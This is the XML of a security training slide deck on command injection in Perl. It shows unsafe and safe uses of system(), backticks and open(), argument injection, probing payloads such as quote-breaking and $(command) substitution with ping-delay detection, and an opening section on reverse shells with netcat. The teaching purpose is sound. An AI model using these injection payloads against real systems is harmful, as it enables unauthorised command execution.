              <a:t>metacharacters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foo &gt; bar	# run 'foo' and overwrite the file 'bar' with the output of 'foo'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo &gt;&gt; bar	# run 'foo' and append the output to the file 'bar'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo &lt; bar	# run 'foo' and feed the contents of the file 'bar' to its STDIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo *		# run 'foo' with the arguments being the name of each of the files in $PWD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>a,r,z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>}	# run 'foo' with the arguments 'baa', 'bar, and '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>baz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo # bar	# run 'foo' with the rest of the line (i.e. 'bar') commented out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo $SHELL	# run 'foo' with the first argument being the value of the variable 'SHELL'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo -b		# run 'foo' with the flag '-b'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo bar\ fizz	# run 'foo' with the first argument being 'bar fizz'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>foo bar" fizz "foo	# run 'foo' with the first argument being 'bar fizz foo'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266222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Anti-pattern: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Using tainted data in the first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" smtClean="0"/>
              <a:t> to system()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01660"/>
            <a:ext cx="105156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./ls_system_unsafe.pl '/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innocent</a:t>
            </a:r>
          </a:p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2235 Dec  9 13:46 /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  <a:p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./ls_system_unsafe.pl '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uptime'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 invocation of 'uptime'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/bin/ls: cannot access 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such file or directory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17:39:32 up 2 days,  6:42,  2 users,  load average: 1.69, 1.55, 1.41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364898"/>
            <a:ext cx="10515600" cy="2524922"/>
            <a:chOff x="838200" y="1321356"/>
            <a:chExt cx="10515600" cy="2524922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690688"/>
              <a:ext cx="10515600" cy="2155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system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"/bin/ls -la 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ls_system_unsafe.pl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39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Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0"/>
              <a:t>Parameterise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0"/>
              <a:t> to system()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01660"/>
            <a:ext cx="10515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./ls_system_safe.pl '/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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innocent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2235 Dec  9 13:46 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  <a:p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./ls_system_safe.pl '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uptime'	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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evil, yet unsuccessful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/bin/ls: cannot access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uptime: No such file or directory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364898"/>
            <a:ext cx="10515600" cy="2524922"/>
            <a:chOff x="838200" y="1321356"/>
            <a:chExt cx="10515600" cy="2524922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690688"/>
              <a:ext cx="10515600" cy="2155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system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"/bin/ls"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"-la"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ls_system_safe.pl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74742" y="1944472"/>
            <a:ext cx="2743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 dirty="0" smtClean="0"/>
              <a:t>WARNING: This code is still vulnerable to argument injection!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239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Anti-pattern: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0"/>
              <a:t>Using tainted data in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" err="1"/>
              <a:t>backticks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01660"/>
            <a:ext cx="105156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./ls_backticks_unsafe.pl '/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	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innocent</a:t>
            </a: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2235 Dec  9 13:46 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./ls_backticks_unsafe.pl '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uptime'		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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 invocation of 'uptime'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cannot access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such file or directory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17:46:54 up 2 days,  6:49,  2 users,  load average: 1.92, 1.59, 1.49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364898"/>
            <a:ext cx="10515600" cy="2755434"/>
            <a:chOff x="838200" y="1321356"/>
            <a:chExt cx="10515600" cy="275543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690688"/>
              <a:ext cx="10515600" cy="2386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my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$data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`ls -la @ARGV[0]`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"$data"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ls_backticks_unsafe.pl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4004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Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0"/>
              <a:t>Don't use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" err="1"/>
              <a:t>backticks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0"/>
              <a:t>. Use open()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92583"/>
            <a:ext cx="105156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./ls_open_safe.pl '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uptime'		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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evil, yet unsuccessful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/bin/ls: cannot access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uptime: No such file or directory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364898"/>
            <a:ext cx="10515600" cy="3688830"/>
            <a:chOff x="838200" y="1321356"/>
            <a:chExt cx="10515600" cy="3688830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690688"/>
              <a:ext cx="10515600" cy="331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open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(EXEC,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'-|'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'/bin/ls'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'-la'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while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my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400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BB668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&lt;EXEC&gt;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4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chomp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"$line\n"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}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close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(EXEC);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ls_open_safe.pl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74742" y="1944472"/>
            <a:ext cx="2743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 dirty="0" smtClean="0"/>
              <a:t>WARNING: This code is still vulnerable to argument injection!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are BNSEC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Barracuda Networks Security, responsible for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>PSIRT – Product Security Incident Response Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>CSIRT – Computer Security Incident Response Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Roster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Matthew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Trimble - BNSEC Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Justin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Kelly, Chris Sutton, Curtis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Means, Eric Escobar, Matt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Orme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>– BNSEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>analysts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Dave Farrow – a casual observer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2407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Anti-pattern: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Using tainted data in 2-arg open()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350385"/>
            <a:ext cx="10515600" cy="3261214"/>
            <a:chOff x="838200" y="1321356"/>
            <a:chExt cx="10515600" cy="3261214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690688"/>
              <a:ext cx="10515600" cy="2891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2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2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2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&lt;file-to-open&gt;\n"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open the file\n"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open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(FD, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="12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2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1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opening the file\n"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while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my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200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BB668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&lt;FD&gt;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2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chomp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"$line\n"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}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close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(EXEC);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1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perl_open_unsafe.pl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8200" y="4662173"/>
            <a:ext cx="10515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./perl_open_unsafe.pl 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/issue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innocent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open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opening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read line [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GNU/Linux stretch/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 \l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./perl_open_unsafe.pl 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'uptime|'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 invocation of 'uptime'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open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opening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read line [ 11:03:24 up 3 days, 12:33, 10 users,  load average: 1.47, 1.61, 1.35]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82390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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" smtClean="0"/>
              <a:t>3-arg open()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350385"/>
            <a:ext cx="10515600" cy="3261214"/>
            <a:chOff x="838200" y="1321356"/>
            <a:chExt cx="10515600" cy="3261214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690688"/>
              <a:ext cx="10515600" cy="2891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2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2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2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&lt;file-to-open&gt;\n"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open the file\n"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open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(FD, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="12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"&lt;"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2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2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2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1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opening the file\n"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while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my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2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=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="BB668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&lt;FD&gt;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2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chomp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$line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sz="12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"$line\n"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}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200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close</a:t>
              </a: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(EXEC);</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="11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1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perl_open_safe.pl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8200" y="4662173"/>
            <a:ext cx="105156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perl_open_safe.pl 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/issue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innocent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open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opening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read line [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GNU/Linux stretch/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\n \l]</a:t>
            </a:r>
          </a:p>
          <a:p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perl_open_safe.pl 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'|uptime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evil, yet unsuccessful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open the file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opening the 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AU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4742" y="1944472"/>
            <a:ext cx="2743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b="1" dirty="0" smtClean="0"/>
              <a:t>WARNING: Of course, this is still a nasty arbitrary file-read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396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Bonus: Argument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close relative to command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Occurs when an attacker has control over an entire program argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>The attacker brings an program argument to a parameter fight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>You expected 'bar' they gave you '-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Solutions in ascending order of effectiveness:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>whitelising</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> the characters the user should be able to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Consider trimming all '-' and '\' (for Windows) characters from start of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Consider putting the attacker-controlled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> after an instance of '--'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8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Bonus: Argument injection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1364898"/>
            <a:ext cx="10515600" cy="2524922"/>
            <a:chOff x="838200" y="1321356"/>
            <a:chExt cx="10515600" cy="2524922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1690688"/>
              <a:ext cx="10515600" cy="2155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system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"/bin/ls"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"-la"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ls_system_safe.pl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3933362"/>
            <a:ext cx="10515600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./ls_system_safe.pl '--time-style=full-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 injection of rogue argument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36</a:t>
            </a:r>
          </a:p>
          <a:p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2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4096 2015-12-13 23:09:27.002974127 -0800 .</a:t>
            </a:r>
          </a:p>
          <a:p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5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4096 2015-12-13 17:00:25.413810837 -0800 ..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206 2015-12-11 17:46:01.430147191 -0800 ls_backticks_unsafe.pl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290 2015-12-11 17:45:19.718036317 -0800 ls_open_safe.pl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195 2015-12-11 16:30:19.786187478 -0800 ls_system_safe.pl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 2015-12-13 23:09:26.962974120 -0800 ls_system_safest.pl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194 2015-12-11 16:30:25.102201260 -0800 ls_system_unsafe.pl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278 2015-12-13 15:59:50.379782257 -0800 perl_open_safe.pl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--r-- 1 user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273 2015-12-11 17:53:47.659397080 -0800 perl_open_unsafe.pl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</p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3179867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Bonus: Argument injection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1364898"/>
            <a:ext cx="10515600" cy="2524922"/>
            <a:chOff x="838200" y="1321356"/>
            <a:chExt cx="10515600" cy="2524922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1690688"/>
              <a:ext cx="10515600" cy="2155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#!/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usr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" i="1" dirty="0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/bin/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="40808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perl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if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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="19177C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!=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666666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1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)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"Usage: $0 &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1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arg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-to-ls&gt;\n"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else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{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"I'm about to do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system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"/bin/ls"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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty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"-la</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="BA212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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400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, "--", </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="19177C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@ARGV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[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666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0</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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]);</a:t>
              </a:r>
              <a:endPara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>
                  <a:solidFill>
                    <a:srgbClr val="008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BA212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"I've finished doing the ls\n"</a:t>
              </a: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;</a:t>
              </a:r>
              <a:endPara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latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                  <a:ea typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="12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132135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ls_system_safest.pl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4136562"/>
            <a:ext cx="105156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./ls_system_safest.pl '--time-style=full-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evil, yet unsuccessful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/bin/ls: cannot access --time-style=full-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such file or directory</a:t>
            </a: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I've finished doing the ls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275366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Finding command injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>vuls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If you have the source code, do a code audit (white-box test)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Run a web vulnerability scanner against the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Hope that it has the logic to trigger the injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Hope that it has the logic to know that it has triggered the injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Beat on it yourself until it breaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Seek functionality for which it "feels" like a command is being run on the back-end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>File/directory manipulation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Troubleshooting tools? e.g. ping or traceroute diagnostic tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Handoffs from one tool to another? e.g. a virus scanner being called on an uploaded file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Hidden functionality might be less-tested and less-thought about</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Go poking around POST parameters perhaps? (use Burp Suite)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29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Triggering and detecting command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Try to break out of quoted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> and kick off a new command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>asdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>'";&lt;command&gt;		# that's a single-quote AND double-quote. Two birds, one stone.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Try causing a command substitution (will work if you're inside double quotes, won't work if you're inside single quotes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>$(command)		# executes 'command' and substitutes its output in-place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>`command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>`		# executes 'command' and substitutes its output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>in-place (deprecated syntax)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>See if you get the same response when you command-substitute an expected parameter value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Do you get the same for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>foo=bar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>foo=$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>echo+bar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Do you get the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>fizz=buzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>fizz=$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>echo+1|awk+'{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>print+"buzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" smtClean="0"/>
              <a:t>"}')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>If so, you're injecting a Rube-Goldberg machine and confirming that it's getting triggered. You win!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>If the injected command blocks page execution, try throwing a delay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Windows - try to execute "ping -n 10 127.0.0.1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Linux - try to execute "ping -c10 127.0.0.1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Don't forget the -c10. Otherwise the ping will never die :(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Try sniffing for pings thrown to you by the victim box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> &lt;interface&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Be creative!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2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Burp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Command injection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Reverse shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Abuse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"Silence" boot2root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95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Command injection isn't cool, you know what's cool?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Sending commands one-by-one to an injectable interface sucks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Sometimes a command injection is "blind", meaning you get to cause an execution of something but you don't get to see the output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>A reverse shell makes a network connection from the victim back to you and presents a shell over that connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>, but backwards and with a lot less authentication to worry about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5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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> - TCP/IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>swiss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> army 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Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>, written by the Hobbit (aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat.traditional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Comes with most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Unices</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>See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dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> for usage instructions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Some useful flags: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AU" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>	(verbose)</a:t>
            </a:r>
